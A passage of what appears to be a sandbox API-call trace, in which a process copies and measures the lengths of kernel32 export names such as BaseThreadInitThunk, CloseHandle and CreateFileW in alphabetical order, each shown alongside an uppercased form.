lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.875] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.875] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.875] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.875] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.875] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.875] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.875] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.875] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.875] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.875] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.875] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.875] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.875] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.876] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.876] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.876] lstrlenA (lpString="BEEP") returned 4 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.876] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.876] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.876] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.876] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.876] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.876] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.876] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.876] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.876] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.876] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.876] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.876] lstrlenA (lpString="CANCELIO") returned 8 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.876] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.876] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.876] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.876] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.877] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.877] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.877] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.877] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.877] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.877] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.877] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.877] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.877] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.877] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.877] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.877] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.877] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.877] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.877] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.877] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.877] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.877] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.877] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.877] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.878] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.878] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.878] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.878] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.878] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.878] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.878] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.878] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.878] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.878] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.878] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.878] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.878] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.878] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.878] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.878] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.878] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.878] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.878] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.878] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.879] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.879] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.879] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.879] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.879] lstrlenA (lpString="COPYFILEA") returned 9 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.879] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.879] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.879] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.879] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.879] lstrlenA (lpString="COPYFILEW") returned 9 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.879] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.879] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.879] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.879] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.879] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.879] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.879] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.879] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.879] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.879] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.880] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.880] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.880] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.880] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.880] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.880] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.880] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.880] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.880] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.880] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.880] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.880] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.880] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.880] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.880] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.880] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.880] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.880] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.880] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.881] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.881] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.881] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.881] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.881] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.881] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.881] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.881] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.881] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.881] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.881] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.881] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.881] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.881] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.881] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.881] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.881] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.881] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.881] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.881] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.882] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.882] lstrcpyA (in: lpString1=0x3f2cf70, 